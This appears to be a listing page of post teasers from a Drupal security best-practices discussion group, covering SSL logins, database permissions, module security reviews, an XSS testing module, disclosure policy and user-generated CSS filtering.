Discussion security best practices in general. This is NOT a place to discuss vulnerabilities in released versions of specific public modules nor Drupal core. Please only ask questions before releasing a module or phrase them generally. If you find a security vulnerability in publicly available code the proper thing to do is report it to the Security Team.
On twitter see @drupalsecurity.
Allowing Apache to write files
There was recently a presentation about whether or not it's safe to let the webserver write to your document root:
http://www.pcworld.com/businesscenter/article/209860/how_default_app_ins...
This is something I've heard our community go back and forth about. I'd like us to come to a more solid position on the topic.
He also cites granting more mysql permissions than necessary as a mistake (one we avoid, though we could be a bit more strict...do we need the permission to drop tables, for example?).
Read more
Secure Login module not dead yet
Secure Login module was in need of a maintainer, so I decided to take it on.
What I like about Secure Login is that it's a small, simple module that makes it easy to enforce secure (SSL) logins on a Drupal site.
I've already committed a Drupal 7 version which could use testing and feedback.
Read more
Best Practices for Module/Theme level Security Reviews
Are there any best practices or approaches to reviewing individual modules or themes?
I do feel that modules posted to Drupal.org are more secure than those posted elsewhere, simply because the framework allows for an easy way for us to receive updates when there are security issues. However, other than people posting security patches, what processes are being used to scan contributed code for problems?
There are a number of approaches for general PHP development which would certainly apply:
http://www.addedbytes.com/writing-secure-php/
Highly-secure Drupal installation
Hi everyone,
What we've been doing around here is trying to put together an implementation framework that would deliver the most secure Drupal possible. Our idea so far is this:
First layer is a Varnish cache - it is the only publically exposed port of the entire infrastructure.
Second layer is a Drupal install with a read-only mysql user (other than the session, watchdog and cache tables of course), so that even if someone elevates permissions in Drupal, they are unable to write anything to the database.
Read moreVuln module, a XSS feature
I created a quick XSS module that last week that I've been using for testing and it was suggested that I post here in case others found it useful. The module is here; http://github.com/miccolis/vuln
The module is simply a bunch of exported (a la Features module) configuration that is loaded with script tags. The idea being that as you build out your site and theme you work with this module enabled occasionally and get an alert when you've slipped up. It is not an automated testing tool.
Security related policies for code hosted on Drupal.org
We've got some licensing and third-party code rules for Drupal.org CVS.
The Security Team has set some policies that it enforces, but these policies impact module maintainers and, so far, we have not really informed maintainers that they should agree to the policies of the Security Team as well.
This is the big one: http://drupal.org/security-advisory-policy
We also attempt to follow a "14 days from reporting to release" and our template e-mail to module maintainers includes a date roughly 14 days in the future:
Read more
Security Alert: Drupal Context module
A researcher has uncovered a potentially serious vulnerability in the open-source content management system used by the White House website and thousands of other sites.
The XSS, or cross-site scripting, bug resides in the Drupal Context module, a plug-in that Whitehouse.gov and about 10,000 other sites use to manage how content is viewed on their sites. According to an advisory published Monday by researcher Justin Klein Keane, the flaw allows attackers to inject malicious scripts into login pages that will reset the site's administrative password.
Read moreAnnouncing Drupal Security Report
Ben and I are happy to have just launched http://drupalsecurityreport.org/
After several months of working on this project the paper has reached 1.0 status.
Of course it wouldn't have been possible without the support of many sponsors and reviewers:
- Cydeck
- Clarity Digital Group
- Acquia
- Chapter Three
- Growing Venture Solutions - GVS
- Krimson
- Zivtech
- Ustima
IBM X-Force Report - Drupal and other systems
There is an IBM X-Force report about the state of security in a variety of platforms.
The researchers make some interesting claims. As always, doing this kind of thing is fraught with questionable assumptions, generalizations, and guesses that make the reports easy targets for criticism in spite of the best efforts of the authors.
One thing to note: they claim that there are unpatched vulnerabilities in a lot of the systems and give numbers for Drupal where I'm not sure what their source data is. If anyone can get in touch with the authors to ask for raw data I'd love to see it.
Read more
webform registration - skipping password changing?
I've written a module that streamlines the registration process for webforms that don't allow anon users to submit.
Before I create a project for it on d.org, I'd like people's opinions on what it does to the login process.
What the module does is this: when an anonymous user goes to the webform node, they are shown the registration form instead. When they first log in, they are taken back to the same webform node. (As far as I can tell, this is not doable with login toboggan or login_destination.)
Read moreTop vulnerabilities in Drupal and how can we make the API easier to understand / "safe by default"
The Common Weaknesses Enumeration (CWE) has lots of information about the most common problems in web software. There is lots of information to sift through, but of the top 25 dangerous programming errors, XSS is #1.
http://cwe.mitre.org/top25/#Listing
This matches what we see within the Drupal project.
What can we (Drupal) do better to avoid this problem?
Read moreremove phpinfo from core for security reasons: PCI-DSS
A site that I'm working on has gone through a PCI scan and the reviewers said that the call to phpinfo disqualifies the site from passing the PCI certification.
Ever since Drupal 5 a call to phpinfo() has been included in system.module.
So, what is the solution if your PCI reviewer sees this as a problem? Do we just patch it to remove the call to phpinfo and replace it with a suitable message? Should we push back on them and say that nobody else is requiring this?
Read more
Adobe Flash / User contributed content vulnerability
So - has anyone else had a chance to look at the Adobe Flash vulnerability?
http://www.foregroundsecurity.com/MyBlog/flash-origin-policy-issues.html
http://www.computerworld.com/s/article/9140768/Flash_flaw_puts_most_site...
It would appear that there is no easy way to handle it short of their suggestion to serve back all user-supplied content from a different domain. I can't see any logical way to accomplish that via Drupal considering the wide range of site sizes and complexities.
Read more
SSL officially insecure?
A zero-day flaw in the TLS and SSL protocols has been made public and man-in-the-middle attacks have been demonstrated. I caught wind of this off of ZDnet.
http://news.zdnet.co.uk/security/0,1000000189,39860592,00.htm
Thoughts?
Read moreLogin Security for Drupal 6 1.0 release is out
It took some time, but finally the 6.x-1.0 version of Login Security module is out. For a brief introduction to the module features please go to the module documentation. The README file included in the module explains the different options for the module settings and a configuration example.
Hope you enjoy the module!
Read moreHow long should we wait to disclose explanations/proof of concept
Login Security, closing last stint for 1.0 release
I'm happy to announce that Login Security module release 6.x-1.0 is about to born. Currently, there is only one issue open. This issue takes care about string consolidation and english grammar. I'm not an english natural speaker, so probably there will be some words and corrections to be done. I would appreciate any help in this issue.
There is a new feature included for this 1.0 release: ongoing bruteforce attack detection that could easily be expanded for more paranoid settings.. probably in the 2.0 :)
You can check current roadmap status and (I hope) participate in the english correction.
Read moreFiltering User Generated CSS
There are several modules which allow for user/admin generated css to be injected into the page.
CSS can contain cross site scripting attacks and the use of url() helps make it a means to exploit CSRF. What can we do to filter user generated CSS so that it is safe?
One strategy seems to be something like the way color module/garland work: users are limited to choosing specific colors which are inserted into specific pieces of the CSS. This is also what a lot of other sites do (twitter, bebo, etc.). That's great, but limiting.
Read more"Login Security" module uses and roadmap for a 6.x stable release
Hi, I'm in process of creating stable release of the "login security" module, and would like to inform current users of this module about it to recall their ideas and most used features, and remove (or not) the rest of them.
Don't know how to make a public call about it, and would not like to create a release to make this kind of notice so everyone will have to update their module version, so I've decided to create it here.
If you have any consideration or would like to know about this stable release please go to:
Read moreSecuring your admin area with SSL in drupal (and other systems)
This article is here to start a discussion about this topic, and maybe go on making this into a GSOC proposal or a new module.
Securing your admin area with SSL in drupal
Setting up a secure administration environment in drupal is still complicated, and might even be an important security flaw in several configurations. A large part of this is due to the architecture of drupal that does not have a dedicated admin area and not much difference between normal (unprivileged) users and admin users.
Read more